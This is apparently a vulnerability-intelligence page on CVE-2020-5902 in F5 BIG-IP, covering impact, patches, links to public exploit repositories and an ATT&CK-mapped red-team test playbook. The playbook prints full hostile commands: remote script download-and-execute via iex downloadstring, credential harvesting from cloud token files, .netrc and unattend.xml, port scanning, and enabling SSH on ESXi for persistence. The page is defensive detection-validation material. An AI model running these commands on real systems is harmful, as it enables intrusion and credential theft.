CVE-2020-5902

CRITICAL CISA KEV EXPLOIT POC TTE Zero-Day Pub 01/07 Upd 21/10

Overview

This vulnerability is a remote code execution flaw rooted in improper input validation within the Traffic Management User Interface (TMUI) of BIG-IP. The affected component fails to adequately sanitize user-supplied input on certain undisclosed web pages, enabling attackers to inject and execute arbitrary commands remotely without authentication. The issue primarily arises from unsafe handling of requests in the TMUI's web-based configuration utility, exposing internal command interfaces.

Vulnerability Description

In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.

Impact

An unauthenticated attacker can execute arbitrary system commands remotely on the BIG-IP device by exploiting this vulnerability, gaining full control over the affected system. This enables unauthorized access to sensitive configuration data, potential disruption of network traffic management, and lateral movement within the network infrastructure. The exploit requires no user interaction or credentials, making it highly accessible and dangerous for operational continuity and data confidentiality.

Solution

F5 Networks has released security updates addressing this vulnerability in BIG-IP versions 15.1.0.4 and later, 14.1.2.6 and later, 13.1.3.4 and later, 12.1.5.2 and later, and 11.6.5.2 and later. Administrators should apply these vendor-provided patches as detailed in the F5 advisory article K52145254 (https://support.f5.com/csp/article/K52145254). No alternative workarounds are recommended; immediate patching is advised to mitigate exploitation risk.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability present in specific versions of BIG-IP's Traffic Management User Interface (TMUI) allows for remote code execution (RCE) through undisclosed pages. This critical flaw arises from improper validation of user input, enabling an attacker to send crafted requests that can execute arbitrary commands on the server. The affected versions span a range of releases, indicating a widespread potential for exploitation across various deployments. The severity of this vulnerability is underscored by its high CVSS score of 9.8, which categorizes it as critical, necessitating immediate attention from organizations using the affected products.

Attack vectors for this vulnerability are particularly concerning due to the nature of the TMUI, which is typically accessible over the internet or internal networks. An attacker could exploit this flaw by sending specially crafted HTTP requests to the vulnerable interface, potentially leading to full system compromise. Scenarios may include an attacker gaining administrative access to the system, allowing them to manipulate configurations, exfiltrate sensitive data, or deploy further malicious payloads. The ability to execute arbitrary code remotely makes this vulnerability a prime target for threat actors, especially in environments where BIG-IP is utilized for critical application delivery and security functions.

The real-world impact of this vulnerability can be profound, especially for organizations that rely on BIG-IP for load balancing, application delivery, and security. Successful exploitation could lead to significant business risks, including data breaches, service disruptions, and reputational damage. Organizations may face regulatory scrutiny and financial penalties if sensitive data is compromised. Moreover, the potential for lateral movement within a network following initial exploitation could allow attackers to pivot to other critical systems, amplifying the overall risk and impact on the organization’s infrastructure.

To detect and mitigate this vulnerability, organizations should prioritize immediate patching of affected systems to the latest versions provided by the vendor. Regular vulnerability assessments and penetration testing can help identify potential exploitation paths and ensure that security controls are effective. Additionally, implementing network segmentation and strict access controls can reduce the attack surface, limiting the exposure of the TMUI to untrusted networks. Monitoring logs for unusual access patterns or anomalies in user behavior can also aid in early detection of exploitation attempts. Organizations should consider employing Web Application Firewalls (WAFs) to filter and monitor HTTP traffic to the TMUI, providing an additional layer of protection against crafted requests.

In conclusion, the remote code execution vulnerability in the TMUI of specific BIG-IP versions poses a significant threat to organizations utilizing these products. The combination of high severity, potential for exploitation, and real-world impact necessitates a proactive approach to security. By implementing robust detection and mitigation strategies, organizations can safeguard their systems against the risks associated with this vulnerability, ensuring the integrity and availability of their critical applications and services.




CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the CVE-2020-5902 vulnerability within F5 BIG-IP systems. Our telemetry indicates a sustained increase in malicious activity leveraging this critical remote code execution flaw, underscoring persistent adversary interest despite prior mitigation efforts. Notably, ransomware groups linked to BackdoorDiplomacy continue to exploit this vulnerability as part of their campaigns, reinforcing its role as a favored vector for initial access and lateral movement. Although the EPSS score remains high and stable, the uptick in observed exploitation attempts signals an elevated operational tempo among threat actors. This development heightens the risk posture for organizations running affected BIG-IP versions, as the vulnerability remains actively targeted with publicly available proof-of-concept tools facilitating exploitation. Consequently, defenders should consider this a significant escalation in the threat landscape, warranting increased vigilance and prioritization in detection and response strategies.



Update 2 — July 08, 2026

CSURFACE threat intelligence has detected a modest increase in exploitation attempts targeting the CVE-2020-5902 vulnerability, accompanied by the emergence of new publicly available proof-of-concept tools that simplify attack automation. This subtle rise in adversary activity, combined with the expanded exploit toolkit, indicates a sustained interest from threat actors, including ransomware-linked groups such as BackdoorDiplomacy, in leveraging this critical remote code execution flaw. Although the overall probability of exploitation remains consistently high, the diversification and accessibility of exploitation resources contribute to a broader attack surface and lower the barrier for less sophisticated actors to conduct successful intrusions. Consequently, the threat level associated with CVE-2020-5902 should be viewed as persistently elevated, underscoring the continued operational relevance of this vulnerability within the current cyber threat landscape.

Affected Products (84)

Vendor Product Version CPE
f5 F5 Big-Ip Access Policy Manager All cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Access Policy Manager All cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Access Policy Manager All cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Access Policy Manager All cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Access Policy Manager All cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Access Policy Manager All cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Firewall Manager All cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Firewall Manager All cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Firewall Manager All cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Firewall Manager All cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Firewall Manager All cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Firewall Manager All cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Web Application Firewall All cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Web Application Firewall All cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Web Application Firewall All cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Web Application Firewall All cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Web Application Firewall All cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Advanced Web Application Firewall All cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Analytics All cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
f5 F5 Big-Ip Analytics All cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
+64 additional CPEs
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

Metasploit (1)

Module Authors Rank Platform Link
F5 BIG-IP TMUI Directory Traversal and File Upload RCE
exploits/linux/http/f5_bigip_tmui_rce_cve_2020_5902
Mikhail Klyuchnikov, wvu Unknown - View

ExploitDB (3)

Title Author Type Platform Date Link
F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion Carlos E. Vieira webapps hardware - View
BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution Critical Start webapps linux - View
BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution (PoC) Budi Khoirudin webapps linux - View

GitHub PoCs (57)

Repository Author Stars Forks Date Link
jas502n/CVE-2020-5902
CVE-2020-5902 BIG-IP
jas502n 374 109 2020-07-05 View
yassineaboukir/CVE-2020-5902
Proof of concept for CVE-2020-5902
yassineaboukir 71 25 2020-07-05 View
theLSA/f5-bigip-rce-cve-2020-5902
F5 BIG-IP RCE CVE-2020-5902 automatic check tool
theLSA 62 17 2020-07-10 View
aqhmal/CVE-2020-5902-Scanner
Automated script for F5 BIG-IP scanner (CVE-2020-5902) using hosts retrieved from Shodan API.
aqhmal 55 22 2020-07-05 View
yasserjanah/CVE-2020-5902
exploit code for F5-Big-IP (CVE-2020-5902)
yasserjanah 43 15 2020-07-06 View
dunderhay/CVE-2020-5902
Python script to exploit F5 Big-IP CVE-2020-5902
dunderhay 36 8 2020-07-06 View
f5devcentral/cve-2020-5902-ioc-bigip-checker
f5devcentral 17 12 2020-07-20 View
zhzyker/CVE-2020-5902
F5 BIG-IP 任意文件读取+远程命令执行RCE
zhzyker 13 8 2020-07-08 View
PushpenderIndia/CVE-2020-5902-Scanner
Automated F5 Big IP Remote Code Execution (CVE-2020-5902) Scanner Written In Python 3
PushpenderIndia 12 7 2020-08-09 View
lijiaxing1997/CVE-2020-5902-POC-EXP
批量扫描CVE-2020-5902,远程代码执行,已测试
lijiaxing1997 10 8 2020-07-06 View
ar0dd/CVE-2020-5902
POC code for checking for this vulnerability. Since the code has been released, I decided to release this one as well. P...
ar0dd 12 2 2020-07-05 View
nsflabs/CVE-2020-5902
nsflabs 8 6 2020-07-05 View
Al1ex/CVE-2020-5902
CVE-2020-5902
Al1ex 10 3 2020-07-11 View
west9b/F5-BIG-IP-POC
CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC集合
west9b 10 2 2022-05-28 View
sv3nbeast/CVE-2020-5902_RCE
sv3nbeast 8 3 2020-07-06 View
MrCl0wnLab/checker-CVE-2020-5902
Checker CVE-2020-5902: BIG-IP versions 15.0.0 through 15.1.0.3, 14.1.0 through 14.1.2.5, 13.1.0 through 13.1.3.3, 12.1.0...
MrCl0wnLab 5 5 2020-07-10 View
d4rk007/F5-Big-IP-CVE-2020-5902-mass-exploiter
F5 Big-IP CVE-2020-5902 mass exploiter/fuzzer.
d4rk007 4 6 2020-07-09 View
rwincey/CVE-2020-5902-NSE
rwincey 8 2 2020-07-05 View
rockmelodies/CVE-2020-5902-rce-gui
GUI
rockmelodies 8 1 2020-07-17 View
jiansiting/CVE-2020-5902
F5 BIG-IP Scanner (CVE-2020-5902)
jiansiting 4 5 2020-07-07 View
dwisiswant0/CVE-2020-5902
CVE-2020-5902
dwisiswant0 9 0 2020-07-04 View
corelight/CVE-2020-5902-F5BigIP
A network detection package for CVE-2020-5902, a CVE10.0 vulnerability affecting F5 Networks, Inc BIG-IP devices.
corelight 4 4 2020-07-28 View
GovindPalakkal/EvilRip
It is a small script to fetch out the subdomains/ip vulnerable to CVE-2020-5902 written in bash
GovindPalakkal 6 0 2020-07-08 View
34zY/APT-Backpack
cve-2019-11510, cve-2019-19781, cve-2020-5902,               cve-2021-1497, cve-2021-20090, cve-2021-22006, cve-2021-2...
34zY 3 1 2022-12-13 View
DeepSecurity-Pe/GoF5-CVE-2020-5902
Script para validar CVE-2020-5902 hecho en Go.
DeepSecurity-Pe 2 2 2020-07-09 View
cybersecurityworks553/scanner-CVE-2020-5902
CVE-2020-5902 scanner
cybersecurityworks553 2 1 2020-07-06 View
murataydemir/CVE-2020-5902
[CVE-2020-5902] F5 BIG-IP Remote Code Execution (RCE)
murataydemir 2 1 2020-08-13 View
faisalfs10x/F5-BIG-IP-CVE-2020-5902-shodan-scanner
simple bash script of F5 BIG-IP TMUI Vulnerability CVE-2020-5902 checker
faisalfs10x 2 1 2021-02-04 View
z3n70/CVE-2020-5902
BIGIP CVE-2020-5902 Exploit POC and automation scanning vulnerability
z3n70 2 1 2022-07-07 View
haisenberg/CVE-2020-5902
Auto exploit RCE CVE-2020-5902
haisenberg 1 2 2021-04-13 View
r0ttenbeef/cve-2020-5902
cve-2020-5902 POC exploit
r0ttenbeef 2 0 2020-07-06 View
Shu1L/CVE-2020-5902-fofa-scan
Shu1L 1 1 2020-07-09 View
jinnywc/CVE-2020-5902
CVE-2020-5902
jinnywc 1 1 2020-07-06 View
halencarjunior/f5scan
F5 BIG IP Scanner for CVE-2020-5902
halencarjunior 1 1 2020-07-08 View
qiong-qi/CVE-2020-5902-POC
批量检测CVE-2020-5902
qiong-qi 2 0 2020-07-10 View
JSec1337/RCE-CVE-2020-5902
BIG-IP F5 Remote Code Execution
JSec1337 1 0 2020-07-06 View
0xAbdullah/CVE-2020-5902
Python script to check CVE-2020-5902 (F5 BIG-IP devices).
0xAbdullah 1 0 2020-07-06 View
renanhsilva/checkvulnCVE20205902
A powershell script to check vulnerability CVE-2020-5902 of ip list
renanhsilva 1 0 2020-07-08 View
amitlttwo/CVE-2020-5902
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic ...
amitlttwo 1 0 2023-02-07 View
k3nundrum/CVE-2020-5902
k3nundrum 0 1 2020-07-07 View
flyopenair/CVE-2020-5902
Exploits for CVE-2020-5902 POC
flyopenair 0 1 2020-07-11 View
freeFV/CVE-2020-5902-fofa-scan
freeFV 0 1 2020-07-12 View
momika233/cve-2020-5902
momika233 0 1 2020-07-12 View
superzerosec/cve-2020-5902
superzerosec 0 1 2020-08-18 View
0xBlackash/CVE-2020-5902
CVE-2020-5902
0xBlackash 0 1 2026-03-16 View
wdlid/CVE-2020-5902-fix
Fix CVE-2020-5902
wdlid 0 1 2020-07-07 View
qlkwej/poc-CVE-2020-5902
dummy poc
qlkwej 1 0 2020-07-06 View
Zinkuth/F5-BIG-IP-CVE-2020-5902
Zinkuth 1 0 2020-07-06 View
DevRafaelprogrammer/F5-BIG-IP
O F5 BIG-IP é uma plataforma de entrega e segurança de aplicações amplamente utilizada em ambientes corporativos. A CVE-...
DevRafaelprogrammer 0 0 2026-07-01 View
GoodiesHQ/F5-Patch
Patch F5 appliance CVE-2020-5902
GoodiesHQ 0 0 2020-07-06 View
Any3ite/CVE-2020-5902-F5BIG
Any3ite 0 0 2020-07-07 View
inho28/CVE-2020-5902-F5-BIGIP
Scan from a given list for F5 BIG-IP and check for CVE-2020-5902
inho28 0 0 2020-07-07 View
cristiano-corrado/f5_scanner
F5 mass scanner and CVE-2020-5902 checker
cristiano-corrado 0 0 2020-07-07 View
ajdumanhug/CVE-2020-5902
POC
ajdumanhug 0 0 2020-07-07 View
dnerzker/CVE-2020-5902
dnerzker 0 0 2020-07-08 View
ludy-dev/BIG-IP-F5-TMUI-RCE-Vulnerability
(CVE-2020-5902) BIG IP F5 TMUI RCE Vulnerability RCE PoC/ Test Script
ludy-dev 0 0 2020-09-09 View
TheCyberViking/CVE-2020-5902-Vuln-Checker
Simple Vulnerability Checker Wrote by me "@TheCyberViking" and A fellow Researcher who wanted to be left Nameless... you...
TheCyberViking 0 0 2020-07-09 View
Exploited in Wild CONFIRMED
Ransomware IN USE
Attacker Interest MEDIUM
Sightings Few sightings

Ransomware Groups 1

BackdoorDiplomacy
CORRELATED
correlation_mitre
2026-04-05

Threat Feed

35 events
2026-07-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-22
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-20
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-31
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-27
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-25
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-05
Exploited by BackdoorDiplomacy

Ransomware group known to exploit this vulnerability

2026-04-05
Exploited by BackdoorDiplomacy

Ransomware group known to exploit this vulnerability

2021-11-03
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2020-07-04
PoC Published (57 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

2020-06-30
Exploit Published (3 ExploitDB, 1 Metasploit)

Public exploit code is available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Remote Code Execution
87% rce
Code Injection
71% code_injection
Path Traversal
69% path_traversal
OS Command Injection
57% command_injection

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059 Command and Scripting Interpreter Kill Chain execution ESXi, IaaS, Identity Provider, Linux, macOS, Network Devices, Office Suite, Windows
T1542.001 System Firmware Kill Chain persistence, defense-evasion Windows, Network Devices
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1046 Network Service Discovery Kill Chain discovery Containers, IaaS, Linux, macOS, Network Devices, Windows
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-64 Using Slashes and URL Encoding Combined to Bypass Validation Logic
33%
High High
CAPEC-78 Using Escaped Slashes in Alternate Encoding
33%
High High
CAPEC-126 Path Traversal
30%
High Very High
CAPEC-76 Manipulating Web Input to File System Calls
30%
High Very High
CAPEC-79 Using Slashes in Alternate Encoding
30%
High High

Red Team Playbook

33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1046 Network Service Discovery for Containers containers Shell
Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and...
Command (Shell)
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
T1046 Port Scan Linux, macOS Bash
Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
Command (Bash)
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
T1046 Port Scan NMap for Windows Windows PowerShell Privileged
Scan ports to check for listening ports for the local host 127.0.0.1
Command (PowerShell)
nmap #{host_to_scan}
T1046 Port Scan Nmap Linux, macOS Shell Privileged
Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
Command (Shell)
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
T1046 Port Scan using nmap (Port range) Linux, macOS Shell Privileged
Scan multiple ports to check for listening ports with nmap
Command (Shell)
nmap -Pn -sV -p #{port_range} #{host}
T1046 Port Scan using python Windows PowerShell
Scan ports to check for listening ports with python
Command (PowerShell)
python "#{filename}" -i #{host_ip}
T1046 Port-Scanning /24 Subnet with PowerShell Windows PowerShell
Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask. The connection attempts to use a timeout parameter in...
Command (PowerShell)
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
    $ip_list = $ipAddr -split ","
    $ip_list = $ip_list.ForEach({ $_.Trim() })
    Write-Host "[i] IP Address List: $ip_list"

    $ports = #{port_list}

    foreach ($ip in $ip_list) {
        foreach ($port in $ports) {
            Write-Host "[i] Establishing connection to: $ip : $port"
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} elseif ($ipAddr -notlike "*,*") {
    if ($ipAddr -eq "") {
        # Assumes the "primary" interface is shown at the top
        $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
        Write-Host "[i] Using Interface $interface"
        $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
    }
    Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
    $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
    # Always assumes /24 subnet
    Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"

    $ports = #{port_list}
    $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }

    foreach ($ip in $subnetIPs) {
        foreach ($port in $ports) {
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} else {
    Write-Host "[Error] Invalid Inputs"
    exit 1
}
T1046 Remote Desktop Services Discovery via PowerShell Windows PowerShell Privileged
Availability of remote desktop services can be checked using get- cmdlet of PowerShell
Command (PowerShell)
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
T1046 WinPwn - MS17-10 Windows PowerShell
Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
T1046 WinPwn - bluekeep Windows PowerShell
Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
T1046 WinPwn - fruit Windows PowerShell
Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
T1046 WinPwn - spoolvulnscan Windows PowerShell
Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
T1059 AutoIt Script Execution Windows PowerShell
An adversary may attempt to execute suspicious or malicious script using AutoIt software instead of regular terminal like powershell or cmd. Calculator will popup when the script is executed successfully.
Command (PowerShell)
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
T1542.001 UEFI Persistence via Wpbbin.exe File Creation Windows PowerShell Privileged
Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms. - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c -...
Command (PowerShell)
echo "Creating %systemroot%\wpbbin.exe"      
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
